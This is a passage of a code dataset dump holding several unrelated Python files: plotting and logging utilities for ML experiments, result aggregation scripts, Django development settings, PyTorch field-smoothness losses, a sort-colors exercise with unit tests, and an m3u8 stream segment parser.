multiple_key_value[index] = index_vector\n multiple_key_value[key + '_' + str(i)] = key_vector\n\n data = pd.DataFrame.from_dict(multiple_key_value) # Create dataframe for plotting\n row_num = data.shape[0]\n column_num = data.shape[1]\n data_new = data\n\n # Calculate mean value in horizontal axis, incompatible with histogram mode\n if average_over != 1:\n if mode != 'histogram':\n new_row_num = int(row_num / average_over)\n data_new = data.head(new_row_num).copy()\n data_new.loc[:, index] = data_new.loc[:, index] * average_over\n for column in range(1, column_num):\n for i in range(new_row_num):\n data_new.iloc[i, column] = data.iloc[i * average_over: i * average_over + average_over,\n column].mean()\n\n data_new['MEAN'] = data_new[data_new.columns[1:]].mean(axis=1) # axis = 1 in columns, first column not counted\n data_new['STD_DEV'] = data_new[data_new.columns[1:-1]].std(axis=1)\n\n if mode == 'histogram':\n histogram_flag = True\n data_new = data.iloc[:, 1:-2].copy().stack() # Mean and variance columns not counted\n else:\n histogram_flag = False\n if mode == 'scatter':\n scatter_flag = True\n else:\n scatter_flag = False\n\n Plotter.plot_any_key_in_log(data=data_new, index=index, key=key, exp_num=self.num,\n scatter_flag=scatter_flag, save_flag=True,\n mean_stddev_flag=True,\n histogram_flag=histogram_flag, save_path=os.path.join(self._root_dir),\n sub_log_dir_name=sub_log_dir_name, save_format=save_format, file_name=file_name)\n","sub_path":"baconian/common/log_data_loader.py","file_name":"log_data_loader.py","file_ext":"py","file_size_in_byte":6349,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"544127878","text":"import pandas as pd\n\nreps = 10\nsource = \"final_test/result5/result_system/\"\ndest = source + \"result_mal_evol.csv\"\n\n\ndef get_value(filename):\n malleable = open(filename, \"r\")\n lines = malleable.readlines()\n wait_time = float(lines[0])\n turn_around_time = float(lines[1])\n utilization = float(lines[3])\n exe = float(lines[4])\n return wait_time, turn_around_time/1000, utilization, exe\n\n\ndef main():\n df = pd.DataFrame(\n columns=['adp_res', 'adp_turn', 'adp_util', 'adp_exe', 'exp_res', 'exp_turn', 'exp_util', 'exp_exe', 'gain_res', 'gain_turn',\n 'gain_util', 'gain_exe', 'resr_res', 'resr_turn', 'resr_util', 'resr_exe',\n 'time_res', 'time_turn', 'time_util', 'time_exe', 'reps', 'perc'])\n for i in range(10, 110, 10):\n for j in range(1, reps + 1, 1):\n fileadp = source + \"adaptation/mal_evol/\" + \"average_mal_evol\" + str(i) + str(j) + \".txt\"\n fileexp = source + \"expansion/mal_evol/\" + \"average_mal_evol\" + str(i) + str(j) + \".txt\"\n filegain = source + \"gain/mal_evol/\" + \"average_mal_evol\" + str(i) + str(\n j) + \".txt\"\n fileres = source + \"resources/mal_evol/\" + \"average_mal_evol\" + str(i) + str(\n j) + \".txt\"\n filetime = source + \"time/mal_evol/\" + \"average_mal_evol\" + str(i) + str(\n j) + \".txt\"\n adp_res, adp_turn, adp_util, adp_exe = get_value(fileadp)\n exp_res, exp_turn, exp_util, exp_exe = get_value(fileexp)\n gain_res, gain_turn, gain_util, gain_exe = get_value(filegain)\n resr_res, resr_turn, resr_util, resr_exe = get_value(fileres)\n time_res, time_turn, time_util, time_exe = get_value(filetime)\n df = df.append({'adp_res': adp_res, 'adp_turn': adp_turn, 'adp_util': adp_util, 'adp_exe': adp_exe, 'exp_res': exp_res,\n 'exp_turn': exp_turn, 'exp_util': exp_util, 'exp_exe': exp_exe,\n 'gain_res': gain_res, 'gain_turn': gain_turn, 'gain_util': gain_util, 'gain_exe': gain_exe, 'resr_res': resr_res,\n 'resr_turn': resr_turn, 'resr_util': resr_util, 'resr_exe': resr_exe,\n 'time_res': time_res, 'time_turn': time_turn, 'time_util': time_util, 'time_exe': time_exe, 'reps': j, 'perc': i},\n ignore_index=True)\n\n df.to_csv(dest)\n\nmain()","sub_path":"generate_reps_result.py","file_name":"generate_reps_result.py","file_ext":"py","file_size_in_byte":2418,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"564140191","text":"import os\nimport os.path as osp\nimport sys\n\ndef get_dir(base_path):\n path = base_path\n ix = -1\n while osp.exists(path):\n ix += 1\n path = base_path + str(ix)\n\n print(osp.join(os.getcwd() + path))\n sys.stdout.flush()\n\n os.makedirs(path)\n return path\n\nclass FileWriter(object):\n def __init__(self, Dir, graph):\n self.f = {}\n self.dir = Dir\n\n if not osp.exists(Dir):\n os.makedirs(Dir)\n\n def add_summary(self, dict, i):\n for key in dict:\n if key not in self.f:\n self.f[key] = open(osp.join(self.dir, '{}.csv'.format(key)), 'w+t')\n\n self.f[key].write(str(i))\n self.f[key].write(',')\n self.f[key].write(str(dict[key]))\n self.f[key].write('\\n')\n self.f[key].flush()\n\n\n","sub_path":"util/logger_util.py","file_name":"logger_util.py","file_ext":"py","file_size_in_byte":821,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"465140565","text":"import numpy as np\nimport random as rnd\nimport constants as cst\nfrom tqdm import tqdm\n\nimport Results as rs\n\n\ndef add_to_hit(hits, revenue, ch, value, coef):\n hits[ch] += 1.0*coef\n revenue[ch] += value*coef\n\n\ndef init_dict(init):\n chan = range(len(cst.coupSubs))\n if init == 0:\n d = dict(map(lambda k: (k, 0), chan))\n else:\n d = dict(map(lambda k: (k, []), chan))\n return d\n\n\ndef full_stats_base(data):\n revenues = (np.zeros((len(cst.channels), len(cst.coupSubs))))\n hits = (np.zeros((len(cst.channels), len(cst.coupSubs)))) \n conversions = (np.zeros((len(cst.coupSubs))))\n conversions_ch = (np.zeros((len(cst.channels))))\n lengthdist = (np.zeros((len(cst.channels))))\n\n for row in tqdm.tqdm(data):\n spl_rev = np.array(map(float, row[3].split(','))) / 1000000\n subs = np.array(map(lambda x: int(float(x)), row[7].split(',')))\n spl_ch = np.array(map(float, row[2].split(',')))\n\n if (min(spl_ch) < 0) and sum(spl_rev) > 0:\n continue\n\n if min(spl_ch) < 0:\n continue\n\n if np.max(subs) > 20:\n continue\n\n for i in range(len(spl_rev)):\n revenues[int(spl_ch[i]), int(subs[i])] += spl_rev[i]\n hits[int(spl_ch[i]), int(subs[i])] += 1\n if spl_rev[i] > 0:\n conversions[int(subs[i])] += 1\n conversions_ch[int(spl_ch[i])] += 1\n\n if len(spl_rev) < 16:\n lengthdist[len(spl_rev)] += 1\n\n return revenues, hits, conversions, lengthdist\n \n\ndef full_stats(data, rtype):\n revenues = []\n full_revenue = 0\n spend = 0\n hits = 0\n conversions = 0\n length_dist = init_dict(0)\n\n for row in tqdm.tqdm(data.values):\n spl_rev = np.array(map(float, row[3].split(',')))/1000000\n spl_spd = np.array(map(float, row[6].split(',')))\n subs = np.max(map(lambda x: int(float(x)), row[7].split(',')))\n\n if np.sum(spl_rev) > 0 and rs.SubResults.CheckType(rtype, subs):\n\n revenues.append(np.sum(spl_rev))\n full_revenue += np.sum(spl_rev)\n\n conversions += len(spl_rev[spl_rev > 0])\n spend += np.sum(spl_spd)\n\n hits += len(spl_rev)\n if len(spl_rev) < 16:\n length_dist[len(spl_rev)] += 1\n\n return revenues, full_revenue, spend, hits, conversions, length_dist\n\n\ndef full_stats_monte(data, rtype):\n revenues = []\n length_dist = init_dict(0)\n full_revenue = 0\n spend = 0\n hits = 0\n conversions = 0\n\n iter = 0.0\n means = []\n amn = means.append\n\n rnd.shuffle(data.values)\n\n for row in tqdm.tqdm(data.values):\n spl_rev = np.array(map(float, row[3].split(',')))/1000000\n spl_spd = np.array(map(float, row[6].split(',')))\n subs = np.max(map(lambda x: int(float(x)), row[7].split(',')))\n\n if np.sum(spl_rev) > 0 and rs.SubResults.CheckType(rtype, subs):\n revenues.append(np.sum(spl_rev))\n full_revenue += np.sum(spl_rev)\n conversions += len(spl_rev[spl_rev > 0])\n spend += np.sum(spl_spd)\n hits += len(spl_rev)\n if len(spl_rev) < 16:\n length_dist[len(spl_rev)] += 1\n \n iter += 1\n\n if np.sum(spl_rev) > 0:\n amn(full_revenue/hits)\n if len(means) > 30 and iter > 10000 and np.std(means[-10:]) < 0.01:\n break\n\n coef = len(data.values) / iter\n\n return revenues, full_revenue*coef, spend*coef, hits*coef, conversions*coef, length_dist\n\n","sub_path":"python.py","file_name":"python.py","file_ext":"py","file_size_in_byte":3500,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"399306426","text":"# Vagrant development settings\n\nfrom .base import * # noqa\n\n\nREDIS = {\n 'host': 'localhost',\n 'port': 6379,\n 'db': 0,\n}\n\nDATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.postgresql_psycopg2',\n 'NAME': 'docs',\n 'USER': 'docs',\n 'PASSWORD': '',\n 'HOST': '',\n 'PORT': '',\n }\n}\n\nBROKER_URL = 'redis://localhost:6379/0'\nCELERY_RESULT_BACKEND = 'redis://localhost:6379/0'\nCELERY_ALWAYS_EAGER = False\n\nCACHES = {\n 'default': {\n 'BACKEND': 'redis_cache.RedisCache',\n 'LOCATION': 'localhost:6379',\n 'PREFIX': 'docs',\n 'OPTIONS': {\n 'DB': 1,\n 'CLIENT_CLASS': 'redis_cache.client.DefaultClient',\n },\n },\n}\n\nSESSION_ENGINE = \"django.contrib.sessions.backends.cached_db\"\n\nSECURE_PROXY_SSL_HEADER = (\"HTTP_X_FORWARDED_PROTOCOL\", \"https\")\nSESSION_COOKIE_DOMAIN = 'localhost'\nSESSION_COOKIE_SECURE = False\nCSRF_COOKIE_DOMAIN = 'localhost'\nCSRF_COOKIE_SECURE = False\n\nTEST_RUNNER = 'django_nose.NoseTestSuiteRunner'\n\nSLUMBER_USERNAME = 'test'\nSLUMBER_PASSWORD = 'test'\nSLUMBER_API_HOST = 'http://localhost:8000'\n\nWEBSOCKET_HOST = 'localhost:8088'\n\nIMPORT_EXTERNAL_DATA = False\nDONT_HIT_DB = False\nPRODUCTION_DOMAIN = 'localhost'\nUSE_SUBDOMAIN = False\n","sub_path":"readthedocs/settings/vagrant.py","file_name":"vagrant.py","file_ext":"py","file_size_in_byte":1265,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"191193800","text":"import torch\nfrom torch.autograd import Variable\n\n\ndef lap(fields, device='cuda'):\n def dx(f):\n p = Variable(torch.zeros((f.size(0),1,f.size(1),2), device=device))\n return torch.cat((p, f[:,1:-1,:,:] - f[:,:-2,:,:], p), 1)\n def dy(f):\n p = Variable(torch.zeros((f.size(0),f.size(1),1,2), device=device))\n return torch.cat((p, f[:,:,1:-1,:] - f[:,:,:-2,:], p), 2)\n def dxf(f):\n p = Variable(torch.zeros((f.size(0),1,f.size(1),2), device=device))\n return torch.cat((p, f[:,1:-1,:,:] - f[:,2:,:,:], p), 1)\n def dyf(f):\n p = Variable(torch.zeros((f.size(0),f.size(1),1,2), device=device))\n return torch.cat((p, f[:,:,1:-1,:] - f[:,:,2:,:], p), 2)\n fields = map(lambda f: [dx(f), dy(f), dxf(f), dyf(f)], fields)\n fields = map(lambda fl: (sum(fl) / 4.0) ** 2, fields)\n field = sum(map(lambda f: torch.sum(f, -1), fields))\n return field\n\ndef jacob(fields):\n def dx(f):\n p = Variable(torch.zeros((f.size(0),1,f.size(1),2), device='cuda'))\n return torch.cat((p, f[:,2:,:,:] - f[:,:-2,:,:], p), 1)\n def dy(f):\n p = Variable(torch.zeros((f.size(0),f.size(1),1,2), device='cuda'))\n return torch.cat((p, f[:,:,2:,:] - f[:,:,:-2,:], p), 2)\n fields = sum(map(lambda f: [dx(f), dy(f)], fields), [])\n field = torch.sum(torch.cat(fields, -1) ** 2, -1)\n return field\n\ndef cjacob(fields):\n def center(f):\n fmean_x, fmean_y = torch.mean(f[:,:,:,0]).item(), torch.mean(f[:,:,:,1]).item()\n fmean = torch.cat((fmean_x * torch.ones((1,f.size(1), f.size(2),1), device='cuda'), fmean_y * torch.ones((1,f.size(1), f.size(2),1), device='cuda')), 3)\n fmean = Variable(fmean).cuda()\n return f - fmean\n\n def dx(f):\n p = Variable(torch.zeros((f.size(0),1,f.size(1),2), device='cuda'))\n d = torch.cat((p, f[:,2:,:,:] - f[:,:-2,:,:], p), 1)\n return center(d)\n def dy(f):\n p = Variable(torch.zeros((f.size(0),f.size(1),1,2), device='cuda'))\n d = torch.cat((p, f[:,:,2:,:] - f[:,:,:-2,:], p), 2)\n return center(d)\n\n fields = sum(map(lambda f: [dx(f), dy(f)], fields), [])\n field = torch.sum(torch.cat(fields, -1) ** 2, -1)\n return field\n\ndef tv(fields):\n def dx(f):\n p = Variable(torch.zeros((f.size(0),1,f.size(1),2), device='cuda'))\n return torch.cat((p, f[:,2:,:,:] - f[:,:-2,:,:], p), 1)\n def dy(f):\n p = Variable(torch.zeros((f.size(0),f.size(1),1,2), device='cuda'))\n return torch.cat((p, f[:,:,2:,:] - f[:,:,:-2,:], p), 2)\n fields = sum(map(lambda f: [dx(f), dy(f)], fields), [])\n field = torch.sum(torch.abs(torch.cat(fields, -1)), -1)\n return field\n\n\ndef field_dx(f, forward=False):\n if forward:\n delta = f[:, 1:-1, :, :] - f[:, 2:, :, :]\n else:\n delta = f[:, 1:-1, :, :] - f[:, :-2, :, :]\n result = delta\n result = torch.nn.functional.pad(delta, pad=(0, 0, 0, 0, 1, 1, 0, 0))\n return result\n\n\ndef field_dy(f, forward=False):\n if forward:\n delta = f[:, :, 1:-1, :] - f[:, :, 2:, :]\n else:\n delta = f[:, :, 1:-1, :] - f[:, :, :-2, :]\n result = delta\n result = torch.nn.functional.pad(delta, pad=(0, 0, 1, 1, 0, 0, 0, 0))\n return result\n\n\ndef field_dxy(f, forward=False):\n if forward:\n delta = f[:, 1:-1, 1:-1, :] - f[:, 2:, 2:, :]\n else:\n delta = f[:, 1:-1, 1:-1, :] - f[:, :-2, :-2, :]\n\n result = delta\n result = torch.nn.functional.pad(delta, pad=(0, 0, 1, 1, 1, 1, 0, 0))\n return result\n\n\ndef field_dxy2(f, forward=False):\n if forward:\n delta = f[:, 1:-1, 1:-1, :] - f[:, 2:, :-2, :]\n else:\n delta = f[:, 1:-1, 1:-1, :] - f[:, :-2, 2:, :]\n\n result = delta\n result = torch.nn.functional.pad(delta, pad=(0, 0, 1, 1, 1, 1, 0, 0))\n return result\n\n\ndef rigidity_score(field_delta, tgt_length, power=2):\n spring_lengths = torch.sqrt(field_delta[..., 0] ** 2 + field_delta[..., 1] ** 2)\n spring_deformations = (spring_lengths - tgt_length).abs() ** power\n return spring_deformations\n\n\ndef pix_identity(size, batch=1, device=\"cuda\"):\n result = torch.zeros((batch, size, size, 2), device=device)\n x = torch.arange(size, device=device)\n result[:, :, :, 1] = x\n result = torch.transpose(result, 1, 2)\n result[:, :, :, 0] = x\n result = torch.transpose(result, 1, 2)\n return result\n\n\ndef rigidity(field, power=2):\n identity = pix_identity(size=field.shape[-2])\n field_abs = field + identity\n\n result = rigidity_score(field_dx(field_abs, forward=False), 1, power=power)\n result += rigidity_score(field_dx(field_abs, forward=True), 1, power=power)\n result += rigidity_score(field_dy(field_abs, forward=False), 1, power=power)\n result += rigidity_score(field_dy(field_abs, forward=True), 1, power=power)\n result += rigidity_score(\n field_dxy(field_abs, forward=True), 2 ** (1 / 2), power=power\n )\n result += rigidity_score(\n field_dxy(field_abs, forward=False), 2 ** (1 / 2), power=power\n )\n result += rigidity_score(\n field_dxy2(field_abs, forward=True), 2 ** (1 / 2), power=power\n )\n result += rigidity_score(\n field_dxy2(field_abs, forward=False), 2 ** (1 / 2), power=power\n )\n result /= 8\n\n # compensate for padding\n result[..., 0:6, :] = 0\n result[..., -6:, :] = 0\n result[..., :, 0:6] = 0\n result[..., :, -6:] = 0\n\n return result.squeeze()\n\n\ndef smoothness_penalty(ptype):\n def penalty(fields, weights=None):\n if ptype == \"lap\":\n field = lap(fields)\n elif ptype == \"jacob\":\n field = jacob(fields)\n elif ptype == \"cjacob\":\n field = cjacob(fields)\n elif ptype == \"tv\":\n field = tv(fields)\n elif ptype == \"rig\":\n field = rigidity(fields[0])\n elif ptype == \"linrig\":\n field = rigidity(fields[0], power=1)\n elif ptype == \"rig1.5\":\n field = rigidity(fields[0], power=1.5)\n elif ptype == \"rig3\":\n field = rigidity(fields[0], power=3)\n else:\n raise ValueError(\"Invalid penalty type: {}\".format(ptype))\n\n if weights is not None:\n field = field * weights\n return field\n return penalty\n\ndef similarity_score(should_reduce=False):\n return lambda x, y: torch.mean((x-y)**2) if should_reduce else (x-y)**2\n","sub_path":"training/loss.py","file_name":"loss.py","file_ext":"py","file_size_in_byte":6343,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"527681446","text":"import seaborn as sn\nimport matplotlib as mpl\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nfrom io import StringIO\nimport sys\nfrom keras.backend import eval\n\ntheme = 'dark'\nmpl.rcParams[\"savefig.dpi\"] = 300\n\ndef changeTheme(newTheme):\n\tglobal theme\n\t\n\ttheme = newTheme\n\tsetTheme()\n\ndef setTheme():\n\tif theme == 'dark':\n\t\ttextColor = 'white'\n\t\tbackgroundColor = '#232323'\n\telse:\n\t\ttextColor = 'black'\n\t\tbackgroundColor = 'white'\n\n\tfor param in ['text.color', 'axes.labelcolor', 'xtick.color', 'ytick.color']:\n\t\tmpl.rcParams[param] = textColor\n\tmpl.rcParams['axes.facecolor'] = backgroundColor\n\n\ndef plotAverageClassifierAccuracy(histories):\n\tsetTheme()\n\taccuracy = getAvgClassifierAccuracy(histories)\n\tplt.axis('off')\n\tplt.text(0,1,f\"%.2f%%\" % accuracy, fontsize=22)\n\tplt.text(0,0,f\"Average accuracy\")\n\ndef plotNetworkLoss(histories):\n\tsetTheme()\n#\tplt.title(\"train vs validation loss\")\n\tminEpochNum = min([len(history['acc']) for history in histories])\n\tfor history in histories:\n\t\tplt.plot(history[\"loss\"], color=\"blue\", label=\"train\", alpha=0.2)\n\t\tplt.plot(history[\"val_loss\"], color=\"orange\", label=\"validation\", alpha=0.2)\n\t\tplt.plot(np.array([history['loss'][:minEpochNum] for history in histories]).mean(axis=0), color=\"blue\", label=\"train\")\n\t\tplt.plot(np.array([history['val_loss'][:minEpochNum] for history in histories]).mean(axis=0), color=\"orange\", label=\"validation\")\n\tplt.ylabel(\"loss\")\n\tplt.xlabel(\"epoch\")\n\ndef plotNetworkAccuracy(histories):\n\tsetTheme()\n#\tplt.title(\"train vs validation accuracy\")\n\tminEpochNum = min([len(history['acc']) for history in histories])\n\tfor history in histories:\n\t\tplt.plot(history[\"acc\"], color=\"blue\", label=\"train\", alpha=0.2)\n\t\tplt.plot(history[\"val_acc\"], color=\"orange\", label=\"validation\", alpha=0.2)\n\t\tplt.plot(np.array([history['acc'][:minEpochNum] for history in histories]).mean(axis=0), color=\"blue\", label=\"train\")\n\t\tplt.plot(np.array([history['val_acc'][:minEpochNum] for history in histories]).mean(axis=0), color=\"orange\", label=\"validation\")\n\tplt.ylabel(\"accuracy\")\n\tplt.xlabel(\"epoch\")\n\ndef plotAverageConfusionMatrix(histories):\n\tsetTheme()\n#\tplt.title(\"avg confusion matrix\")\n\tmeanConfusionMatrix = [\n\t\t[int(np.mean([history['confusionMatrix'][0][0] for history in histories])),\n\t\t int(np.mean([history['confusionMatrix'][0][1] for history in histories]))],\n\t\t[int(np.mean([history['confusionMatrix'][1][0] for history in histories])),\n\t\t int(np.mean([history['confusionMatrix'][1][1] for history in histories]))]\n\t]\n\tdf_cm = pd.DataFrame(meanConfusionMatrix, index = ['therapeutic', 'inducing'],\n\t\t\t\t\t columns = ['therapeutic', 'inducing'])\n\tplt.ylabel(\"predictions\")\n\tplt.xlabel(\"labels\")\n\tsn.heatmap(df_cm, annot=True, fmt='d')\n\ndef plotNetworkMetrics(histories):\n\tsetTheme()\n\tplt.axis('off')\n\tplt.text(0,1.0,f\"%.2f%%\" % (getAvgMaxNetworkAccuracy(histories)),\n\t\t\tfontsize=22)\n\tplt.text(0,0.95,f\"avg max validation accuracy\")\n\ndef plotClassifierMetrics(histories):\n\tsetTheme()\n\tplt.axis('off')\n\tplt.text(0,1.0,f\"%.2f%%\" % (getAvgClassifierAccuracy(histories)),\n\t\t\t fontsize=22)\n\tplt.text(0,0.95,f\"avg validation accuracy\")\n\ndef getAvgClassifierAccuracy(histories):\n\treturn np.mean([history['accuracy'] for history in histories]) * 100\n\ndef getAvgMaxNetworkAccuracy(histories):\n\treturn np.array([max(history['val_acc']) for history in histories]).mean(axis=0) * 100\n\ndef plotNetworkAttributes(model):\n\tsetTheme()\n\tplt.axis('off')\n\tplt.text(0, .8, f'Learning rate: {eval(model.optimizer.lr)}', fontsize=12)\n\ndef analyzeNetwork(title, histories):\n\tsetTheme()\n\tplt.figure(figsize=(18,0.2))\n\tplt.axis('off')\n\tplt.text(0,.7, title, fontsize=30)\n\tplt.show()\n\n\tfig = plt.figure(figsize=(16,5))\n\tplt.subplot(1,2,1)\n\tplotNetworkMetrics(histories)\n\tplt.subplot(1,2,2)\n\tplotAverageConfusionMatrix(histories)\n\tplt.show()\n\n\tfig = plt.figure(figsize=(16,5))\n\tplt.subplot(1,2,1)\n\tplotNetworkLoss(histories)\n\tplt.subplot(1,2,2)\n\tplotNetworkAccuracy(histories)\n\tplt.show()\n\ndef analyzeClassifier(title, histories):\n\tsetTheme()\n\tplt.figure(figsize=(18,0.2))\n\tplt.axis('off')\n\tplt.text(0,.7, title, fontsize=30)\n\tplt.show()\n\t\n\tfig = plt.figure(figsize=(16,5))\n\tplt.subplot(1,2,1)\n\tplotClassifierMetrics(histories)\n\tplt.subplot(1,2,2)\n\tplotAverageConfusionMatrix(histories)\n\tplt.show()\n\ndef analyzePredictionModels(title, histories):\n\tsetTheme()\n\tplt.figure(figsize=(18,0.2))\n\tplt.axis('off')\n\tplt.text(0,.7, title, fontsize=30)\n\tplt.show()\n\t\n\tfig = plt.figure(figsize=(16,5))\n\tplt.subplot(1,2,1)\n\tplt.text(0,0.2,f\"%.2f%%\" % (getAvgMaxNetworkAccuracy(histories)),\n\t\t\t fontsize=22)\n\tplt.text(0,0,f\"avg max validation accuracy\")\n\tplt.show()\n\tfig = plt.figure(figsize=(16,5))\n\tplt.subplot(1,2,1)\n\tplt.title(\"train vs validation loss\")\n\tfor history in histories:\n\t\tplt.plot(history[\"loss\"], color=\"blue\", label=\"train\")\n\t\tplt.plot(history[\"val_loss\"], color=\"orange\", label=\"validation\")\n\tplt.ylabel(\"loss\")\n\tplt.xlabel(\"epoch\")\n\tplt.subplot(1,2,2)\n\tplt.title(\"train vs validation accuracy\")\n\tfor history in histories:\n\t\tplt.plot(history[\"acc\"], color=\"blue\", label=\"train\")\n\t\tplt.plot(history[\"val_acc\"], color=\"orange\", label=\"validation\")\n\tplt.ylabel(\"accuracy\")\n\tplt.xlabel(\"epoch\")\n\tplt.show()\n\ndef compareModels(title, metric, values, accuracies):\n\tsetTheme()\n\tplt.figure(figsize=(18,1.5))\n\tplt.axis('off')\n\tplt.text(0,1, title, fontsize=26)\n\n\tplt.text(0,0.4, metric, fontsize=18)\n\tfor i in range(len(values)):\n\t\tplt.text(0.1 * (i+1),0.4, values[i], fontsize=18)\n\n\tplt.text(0,0,\"accuracy\", fontsize=18)\n\tfor i in range(len(values)):\n\t\tplt.text(0.1 * (i+1),0, \"%.2f\" % (accuracies[i]), fontsize=18)\n\n\tplt.show()\n\ndef compareNetworks(titel1, titel2, histories1, histories2, model1=None, model2=None):\n\tsetTheme()\n\tfig = plt.figure(figsize=(16,.5))\n\tplt.axis('off')\n\tplt.text(0, 0, titel1, fontsize=30)\n\tplt.text(.5, 0, titel2, fontsize=30)\n\tplt.show()\n\n\n\tif model1 is not None and model2 is not None:\n\t\told_stdout = sys.stdout\n\t\tmodel1Output = StringIO()\n\t\tsys.stdout = model1Output\n\t\tprint(model1.summary())\n\t\tmodel2Output = StringIO()\n\t\tsys.stdout = model2Output\n\t\tprint(model2.summary())\n\t\tsys.stdout = old_stdout\n\t\tmodel1Summary = model1Output.getvalue().replace('=', '')\n\t\tmodel2Summary = model2Output.getvalue().replace('=', '')\n\n\t\tfig = plt.figure(figsize=(16,3))\n\t\tplt.axis('off')\n\t\tplt.text(0, 0, model1Summary, fontsize=12)\n\t\tplt.text(.5, 0, model2Summary, fontsize=12)\n\t\tplt.show()\n\n\t\tfig = plt.figure(figsize=(16, .5))\n\t\tplt.subplot(1,2,1)\n\t\tplotNetworkAttributes(model1)\n\t\tplt.subplot(1,2,2)\n\t\tplotNetworkAttributes(model2)\n\t\tplt.show()\n\n\tfig = plt.figure(figsize=(16, 1))\n\tplt.subplot(1,2,1)\n\tplotNetworkMetrics(histories1)\n\tplt.subplot(1,2,2)\n\tplotNetworkMetrics(histories2)\n\tplt.show()\n\n\tfig = plt.figure(figsize=(16,5))\n\tplt.subplot(1,2,1)\n\tplotNetworkLoss(histories1)\n\tplt.subplot(1,2,2)\n\tplotNetworkLoss(histories2)\n\tplt.show()\n\n\tfig = plt.figure(figsize=(16,5))\n\tplt.subplot(1,2,1)\n\tplotNetworkAccuracy(histories1)\n\tplt.subplot(1,2,2)\n\tplotNetworkAccuracy(histories2)\n\tplt.show()\n\n\tfig = plt.figure(figsize=(16,5))\n\tplt.subplot(1,2,1)\n\tplotAverageConfusionMatrix(histories1)\n\tplt.subplot(1,2,2)\n\tplotAverageConfusionMatrix(histories2)\n\tplt.show()\n","sub_path":"utils/plotting.py","file_name":"plotting.py","file_ext":"py","file_size_in_byte":7140,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"546646977","text":"import unittest\n\n\nclass Solution(object):\n def sortColors(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: void Do not return anything, modify nums in-place instead.\n \"\"\"\n if not nums:\n return\n\n n = len(nums)\n\n # for every i < left, nums[i] == 0\n left = 0\n while left < n and nums[left] == 0:\n left += 1\n\n # for every i > right, nums[i] == 2\n right = n - 1\n while right >= 0 and nums[right] == 2:\n right -= 1\n\n # for every left <= i < mid, nums[i] == 1\n mid = left\n while mid <= right:\n if nums[mid] == 0:\n nums[mid], nums[left] = nums[left], nums[mid]\n left += 1\n elif nums[mid] == 2:\n if nums[right] == 1:\n nums[mid], nums[right] = nums[right], nums[mid]\n else:\n nums[mid], nums[right] = nums[right], nums[mid]\n nums[mid], nums[left] = nums[left], nums[mid]\n left += 1\n while True:\n right -= 1\n if right == mid or nums[right] != 2:\n break\n mid += 1\n\n\nclass Test(unittest.TestCase):\n def test(self):\n self._test([], [])\n self._test([0], [0])\n self._test([2, 0, 1], [0, 1, 2])\n self._test([2, 0], [0, 2])\n self._test([1, 2, 0, 0], [0, 0, 1, 2])\n self._test([1, 2, 0], [0, 1, 2])\n self._test([2, 1, 0, 1], [0, 1, 1, 2])\n\n def _test(self, nums, expected):\n Solution().sortColors(nums)\n self.assertEqual(nums, expected)\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"p075_threesort.py","file_name":"p075_threesort.py","file_ext":"py","file_size_in_byte":1722,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"35700415","text":"import datetime\r\n\r\nimport m3u8\r\n\r\nimport src.formulator\r\nimport src.stream_receiving\r\nfrom src.data_models import TsSegment\r\n\r\n\r\nclass PowernetFormulator(src.formulator.M3u8Formulator):\r\n\r\n def __init__(self, config: src.stream_receiving.M3u8Watcher.Config):\r\n self.m3u8_url = config.m3u8_url\r\n self.ts_base_url = config.ts_base_url\r\n self.name = config.non_null_name()\r\n self.tag = \"PowernetFormulator@\" + str(self.name)\r\n self.timezone_fix = config.timezone_h_fix\r\n\r\n __ad_met__ = False\r\n\r\n def update_queue(self):\r\n playlist = m3u8.load(self.m3u8_url)\r\n for s in playlist.segments:\r\n try:\r\n start_time = self.__parse_time__(s.uri)\r\n dur = s.duration\r\n uri = self.ts_base_url + str(s.uri)\r\n ts_segment = TsSegment(\r\n uri=uri,\r\n duration=dur,\r\n start_time=start_time,\r\n type_=TsSegment.TYPE_TS_CONTENT\r\n )\r\n self.__add_if_needed__(ts_segment)\r\n\r\n except ValueError:\r\n # Эта ветка сработает, если Powernet отправил рекламный ts\r\n ts_segment = TsSegment(\r\n uri=None,\r\n duration=0,\r\n start_time=None,\r\n type_=TsSegment.TYPE_TS_AD\r\n )\r\n\r\n # Если реклама встречается только единожды, при первом подключении, то эта условная ветка будет работать\r\n # корректно -- добавлять только первое упоминание рекламного сегмента, а остальные игнорировать.\r\n # Если же реклама может встретиться ещё когда-то, помимо первого подключения, то данный условный блок\r\n # нужно будет переработать\r\n if not self.__ad_met__:\r\n self.queue.put(ts_segment)\r\n self.__ad_met__ = True\r\n\r\n #\r\n # Конец публичной зоны\r\n #\r\n\r\n __last_start_time__ = None\r\n __tolerance__ = 0.08\r\n\r\n def __add_if_needed__(self, ts_segment):\r\n if self.__last_start_time__ is None \\\r\n or ts_segment.start_time > self.__last_start_time__:\r\n self.queue.put(ts_segment)\r\n self.__last_start_time__ = ts_segment.end_time\r\n\r\n # Пример относительного пути, из которого нужно вытащить данные о дате и времени записи\r\n # \"2020/02/27/07/45/12-06000.ts?token=f0f5fdcf-dce2-4f91-bca0-fd2dd1c3af60\"\r\n def __parse_time__(self, uri):\r\n y = int(uri[0:4])\r\n m = int(uri[5:7])\r\n d = int(uri[8:10])\r\n h = int(uri[11:13]) + self.timezone_fix\r\n minutes = int(uri[14:16])\r\n s = int(uri[17:19])\r\n ms = int(uri[20:25])\r\n start_time = datetime.datetime(y, m, d, h, minutes, s, ms)\r\n return 